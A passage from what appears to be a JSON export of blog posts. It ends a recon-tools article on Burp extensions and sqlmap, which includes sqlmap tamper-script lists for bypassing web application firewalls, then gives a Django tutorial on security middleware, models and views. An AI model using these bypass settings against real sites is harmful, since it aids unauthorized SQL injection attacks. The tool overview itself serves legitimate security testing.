The most exciting part is that the attacks are configured using a Python script.</font></div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large; color: rgb(14, 16, 26);\">I use this tool regularly to exploit Race Condition/HTTP Request Smuggling&nbsp;vulnerabilities.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large;\"><b style=\"color: rgb(14, 16, 26);\">GitHub Project -&nbsp;</b><a href=\"https://github.com/PortSwigger/turbo-intruder\"><font color=\"#dd4124\"><b>turbo-intruder</b></font></a></div><div style=\"font-size: large;\"><br></div><div style=\"\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Param Miner</font></strong><br></div><div style=\"\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div style=\"\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large; color: rgb(14, 16, 26);\">It is one more Burp extension coded by&nbsp;<a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - @albinowax</font></a>. 
And the purpose of this tool is to identify hidden, unlinked parameters.&nbsp; This tool is helpful to exploit the \"Web Cache Poisoning\" vulnerability.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large;\"><font color=\"#0e101a\"><b>GitHub Project</b>&nbsp;-&nbsp;</font><a href=\"https://github.com/portswigger/param-miner\"><font color=\"#dd4124\"><b>param-miner</b></font></a></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Burp Collaborator</font></strong><br></div><div style=\"font-size: large;\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div style=\"\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large; color: rgb(14, 16, 26);\">I use Collaborator to exploit the Blind SSRF vulnerability. 
And I'll also recommend using this tool to exploit SQLi and Command Execution vulnerability.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><ul><li><a href=\"https://portswigger.net/burp/documentation/collaborator\"><font color=\"#dd4124\"><b>Collaborator</b></font></a></li></ul></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><br></font></b></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\">SQLMap</font></b><br></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><br></font></b></div><div style=\"\"><div style=\"\"><font color=\"#0e101a\" style=\"\" size=\"4\">I use sqlmap to exploit SQL injection vulnerability. And tamper scripts to bypass WAF.</font></div><div style=\"\"><font color=\"#0e101a\" size=\"4\"><br></font></div><div style=\"\"><font style=\"\" size=\"4\"><font color=\"#0e101a\"><b>GitHub Project -&nbsp;</b></font></font><a href=\"https://github.com/sqlmapproject/sqlmap\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>sqlmap</b></font></a></div><div style=\"\"><br></div><div style=\"\"><b>General Tamper Scripts</b></div></div></span></div></span></div></span></div><p></p></div></div></span></span></div></span></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">tamper<span class=\"token operator\">=</span>apostrophemask<span class=\"token punctuation\">,</span>apostrophenullencode<span class=\"token punctuation\">,</span>base64encode<span class=\"token punctuation\">,</span>between<span class=\"token punctuation\">,</span>chardoubleencode<span class=\"token punctuation\">,</span>charencode<span class=\"token punctuation\">,</span>charunicodeencode<span class=\"token punctuation\">,</span>equaltolike<span class=\"token punctuation\">,</span>greatest<span class=\"token punctuation\">,</span>ifnull2ifisnull<span class=\"token punctuation\">,</span>multiplespaces<span class=\"token 
punctuation\">,</span>\nnonrecursivereplacement<span class=\"token punctuation\">,</span>percentage<span class=\"token punctuation\">,</span>randomcase<span class=\"token punctuation\">,</span>securesphere<span class=\"token punctuation\">,</span>space2comment<span class=\"token punctuation\">,</span>space2plus<span class=\"token punctuation\">,</span>space2randomblank<span class=\"token punctuation\">,</span>unionalltounion<span class=\"token punctuation\">,</span>unmagicquotes</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b>MSSQL Tamper Scripts</b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">tamper<span class=\"token operator\">=</span>between<span class=\"token punctuation\">,</span>charencode<span class=\"token punctuation\">,</span>charunicodeencode<span class=\"token punctuation\">,</span>equaltolike<span class=\"token punctuation\">,</span>greatest<span class=\"token punctuation\">,</span>multiplespaces<span class=\"token punctuation\">,</span>nonrecursivereplacement<span class=\"token punctuation\">,</span>percentage<span class=\"token punctuation\">,</span>randomcase<span class=\"token punctuation\">,</span>securesphere<span class=\"token punctuation\">,</span>sp_password<span class=\"token punctuation\">,</span>space2comment<span class=\"token punctuation\">,</span>\nspace2dash<span class=\"token punctuation\">,</span>space2mssqlblank<span class=\"token punctuation\">,</span>space2mysqldash<span class=\"token punctuation\">,</span>space2plus<span class=\"token punctuation\">,</span>space2randomblank<span class=\"token punctuation\">,</span>unionalltounion<span class=\"token punctuation\">,</span>unmagicquotes</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b>MySQL Tamper Scripts</b></div><div><div class=\"code-toolbar\"><pre 
class=\" language-js\">tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,\nmodsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,\nspace2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">The above tools have always been my favourite tools which I use during my RECON phase. There are also many other tools, which I often use for information gathering, but the mentioned tools are also enough to gather as much information.</font><br></div><div><font size=\"4\"><br></font></div><div><div style=\"\"><font size=\"4\">I hope the article gave you an insight into RECON tools. And I'll talk about some more different tools and techniques soon.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Please share this article on your social media, so others can also be aware of RECON by reading this post.</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Why I switched to Django over any other framework?",
            "blog_id": "why-i-switched-to-django-over-any-other-framework",
            "author": "Anshuman Pattnaik",
            "published_date": "2021-06-08T18:18:10.389373Z",
            "last_updated_date": "2021-06-08T22:20:59.009767Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/large_thumbnail.png",
            "keywords": [
                "django",
                "python3",
                "fullstack"
            ],
            "highlights": "In this article, I'll discuss my recent web development using Django, that how Django can be helpful, developing web application projects in terms of (raid development, clean design & high security).",
            "description": "<div><font style=\"\"><font size=\"4\">In this article, I'll discuss my recent web development using Django and if you're new to this website, let me give you a short brief.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\" color=\"#023e7d\"><b>HackbotOne platform is a blogging website. The idea behind this platform is to publish contents from Application Security &amp; Software Development like (Application Development, Security Tools, Bug Bounty write-ups, Open-Source projects and many more) which can be helpful for those who have an interest and passion in these areas.</b></font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><div class=\"video-responsive\">  \n<iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/TRaejKHVhj8\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">For the past couple of months, I did few reviews of <a href=\"https://github.com/anshumanpattnaik/hackbotone-mern-website\"><font color=\"#dd4124\">HackbotOne</font></a> old website, which I built using MERN stack a few years ago. And found out many missing parts in terms of design, technology stack &amp; security protection of the website and many more. 
So I had to rebuild the site from scratch with a new architecture, and this time, I have chosen <a href=\"https://www.djangoproject.com/\"><font color=\"#dd4124\">Django</font></a> as the technology stack.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">Now the question is: why have I switched to Django over the <a href=\"https://www.mongodb.com/mern-stack\"><font color=\"#dd4124\">MERN</font></a> stack?</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">Let me explain to you in brief.<br></font></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><b style=\"\"><font size=\"5\">Why Django?</font></b><br></font></div><div><font style=\"\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">In terms of full-stack web development, Django has gained much popularity in the industry. And due to its architecture (rapid development, clean design &amp; high security), many giant technology companies like (<font color=\"#dd4124\"><b>YouTube, Netflix, Facebook, Instagram, UBER &amp; many more</b></font>) are running on the Django web framework. The framework comes with a toolkit that saves lots of time for the developers and allows them to reuse the same components every time. Developers spend time only on building the new modules that are unique to their project. 
Django is free and <a href=\"https://github.com/django/django\"><font color=\"#dd4124\">open-source</font></a>, with vast community support that helps developers build web applications faster and more securely while also contributing to the open-source community.</font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">Now, I'll explain the parts of Django's architecture that I found important and that help to build a full-stack web application efficiently.</font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><b style=\"\"><font size=\"4\">Contents</font></b><br></font></font></div><div><ul><li><font style=\"\"><font style=\"\"><font size=\"4\">Django Security Protection<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\">How does Django provide security protection?<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\">What is the Django MVT (Models Views Templates) design pattern?</font></font></font></li></ul><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"5\">Django Security Protection</font></b><br></div><div><font size=\"4\"><br></font></div></div><div><font size=\"4\">Web application security is essential in every web development project to reduce the security risk to the application. So before starting to rebuild this website, I was most concerned about the security aspect, so that the website can be maintained more efficiently and securely. In today's modern web application development, there are many web frameworks available for developing a full-stack web application, but not every framework provides security by default to protect the application. 
And as per my research, I found Django has an excellent reputation for protecting web application from security vulnerabilities as it provides security protection by default.</font><br></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">Django has built-in security middlewares that cover <a href=\"https://owasp.org/www-project-top-ten/\"><font color=\"#dd4124\">OWASP Top 10</font></a> security guidelines to protect the web application.</font><br></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><b style=\"\"><font size=\"4\">Security in Django</font></b></font></font></div><div><ol><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Cross-site scripting (XSS)<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Cross-site request forgery (CSRF)<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">SQL injection<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Clickjacking<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">SSL/HTTPS<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Host header validation<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Referrer policy<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Session security<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">User-uploaded content<br></font></font></font></li></ol><div><font size=\"4\"><br></font></div><div><font size=\"4\">Django security guideline says although it provides good security protection still it's the developer responsibility to 
follow some of the basic guidelines while deploying the application into production.</font><br></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to Django security documentation for more information.</font></div><div><ul><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/security/\"><font color=\"#dd4124\">Django Security</font></a></font></li></ul><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"4\">How Django protect security within the framework?</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">To handle security vulnerabilities, Django provides built-in security middlewares to protect the application. And under the <a href=\"https://github.com/anshumanpattnaik/hackbotone-website/blob/main/hackbotone/settings.py\"><font color=\"#dd4124\">settings.py</font></a> file of every Django project, these middlewares can be found.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">MIDDLEWARE</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token string\">'django.middleware.security.SecurityMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.sessions.middleware.SessionMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.common.CommonMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.csrf.CsrfViewMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.auth.middleware.AuthenticationMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.messages.middleware.MessageMiddleware'</span><span 
class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.clickjacking.XFrameOptionsMiddleware'</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">These middlewares work like a plugin to handle various security vulnerabilities to protect the web application. And Django also allows us to create custom middleware which is also a great feature to write security plugin.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to Django official security middleware documentation for more information.</font></div><div><ol><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/ref/middleware/\"><font color=\"#dd4124\">Django Middleware</font></a><br></font></li><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/2.2/_modules/django/middleware/security/\"><font color=\"#dd4124\">Security Middleware</font></a><br></font></li><li><a href=\"https://docs.djangoproject.com/en/3.2/topics/http/middleware/\"><font size=\"4\" color=\"#dd4124\">HTTP Middleware</font></a><br></li></ol><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"5\">What is Django MVT (Models Views Templates) design pattern?</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">The software design pattern is always quite important in every software development project, and Django follows MVT (Model View Template) design pattern in every web application project.</font><br></div><div><b><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"4\">Models</font></b><br></div><div><br></div><div><font size=\"4\">The model is a class that subclasses <a href=\"https://docs.djangoproject.com/en/3.2/ref/models/instances/#django.db.models.Model\"><font 
color=\"#dd4124\">django.db.models.Model</font></a> and Django use these models to create tables in the database. And the model act as an interface to simplify the complex database query and maps to one single table in the database, an attribute of the model represent as database fields.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Quick example</b><br></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">In this example below, <a href=\"https://github.com/anshumanpattnaik/hackbotone-api/blob/main/blogs/models.py#L5\" style=\"\"><font color=\"#dd4124\">Blog</font></a> is a model class with 15 fields defined as class attributes and maps to the database column.&nbsp;</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token keyword\">class</span> <span class=\"token class-name\">Blog</span><span class=\"token punctuation\">(</span>models<span class=\"token punctuation\">.</span><span class=\"token property-access\"><span class=\"token maybe-class-name\">Model</span></span><span class=\"token punctuation\">)</span><span class=\"token operator\">:</span>\n   title <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   blog_id <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token 
punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   author <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   published_date <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">DateTimeField</span></span><span class=\"token punctuation\">(</span>auto_now_add<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   last_updated_date <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">DateTimeField</span></span><span class=\"token punctuation\">(</span>auto_now<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   seo_thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span 
class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   small_thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   keywords <span class=\"token operator\">=</span> <span class=\"token function\"><span class=\"token maybe-class-name\">ArrayField</span></span><span class=\"token punctuation\">(</span>models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   highlights <span class=\"token operator\">=</span> 
models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   description <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   visibility <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   is_featured <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   featured_board <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token 
operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   featured <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Django's Database engine will map to the above model and create a table like below.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">CREATE</span> <span class=\"token constant\">TABLE</span> <span class=\"token keyword\">public</span><span class=\"token punctuation\">.</span><span class=\"token method function property-access\">blogs_blog</span> <span class=\"token punctuation\">(</span>\n\tid serial <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span> <span class=\"token constant\">PRIMARY</span> <span class=\"token constant\">KEY</span><span class=\"token punctuation\">,</span>\n\ttitle character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tblog_id character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token 
constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tauthor character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tpublished_date timestamp <span class=\"token keyword\">with</span> time zone <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tlast_updated_date timestamp <span class=\"token keyword\">with</span> time zone <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tseo_thumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tsmall_thumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tthumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tkeywords character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\thighlights text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tdescription text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tvisibility boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tis_featured boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tfeatured text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tfeatured_board boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span>\n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Please refer to the official Django documentation on models for further understanding.</font><br></div><div><ul><li><a href=\"https://docs.djangoproject.com/en/3.2/topics/db/models/\"><font color=\"#dd4124\" size=\"4\">DB Models</font></a><br></li></ul><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"4\">Views</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font style=\"\"><font size=\"4\">Django views are essential components of every web application: a view takes a web request and returns a web response. 
The response can be anything, such as an HTML page or a redirect to another page.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><b style=\"\"><font size=\"4\">The official Django documentation says&nbsp;</font></b></font></div><div><font style=\"\"><b style=\"\"><font size=\"4\"><br></font></b></font></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\" style=\"\" color=\"#023e7d\"><b style=\"\">When a page is requested, Django creates an HttpRequest object that contains metadata about the request. Then Django loads the appropriate view, passing the HttpRequest as the first argument to the view function. 
Each view is responsible for returning an HttpResponse object.</b></font></span></span><font size=\"4\" style=\"color: rgb(107, 91, 149);\"><b><br></b></font></div><div><font style=\"\"><em style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\"><br></font></span></em></font></div><div><font color=\"#0e101a\" size=\"4\"><b>Quick example</b></font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token keyword module\">from</span> django<span class=\"token punctuation\">.</span><span class=\"token property-access\">shortcuts</span> <span class=\"token keyword module\">import</span> render\n\ndef <span class=\"token function\">index</span><span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">)</span><span class=\"token operator\">:</span>\n   <span class=\"token keyword control-flow\">return</span> <span class=\"token function\">render</span><span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">,</span> <span class=\"token string\">'index.html'</span><span class=\"token punctuation\">)</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Let's understand the above example code line by line.</font><br></div><div><ol><li><font size=\"4\">First, we imported the render method that returns the HttpResponse 
object.<br></font></li><li><font size=\"4\">Second, we defined an index function that takes the request object as an argument, which is an HttpRequest object.<br></font></li><li><font size=\"4\">Third, the index function is a view function that returns the HttpResponse object.</font></li></ol></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to the official Django documentation on view functions for further understanding.</font><br></div><div><ul><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/http/views/\"><font color=\"#dd4124\">Django Views</font></a><br></font></li></ul><div><b><br></b></div><div><b><font size=\"4\">Templates</font></b><br></div></div><div><b><font size=\"4\"><br></font></b></div><div><font size=\"4\">Django templates are the third most essential component of the web application. Templates provide a layout for the web pages so that the user can view the final website. In Django, templates are built using HTML, CSS &amp; JavaScript, which are the core components of a webpage.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">The Django template system is configured in <a href=\"https://github.com/anshumanpattnaik/hackbotone-api/blob/main/api/settings.py\"><font color=\"#dd4124\">settings.py</font></a>, which holds configuration such as the DIRS path.</font><br></div><div><font size=\"4\"><br></font></div><div><div 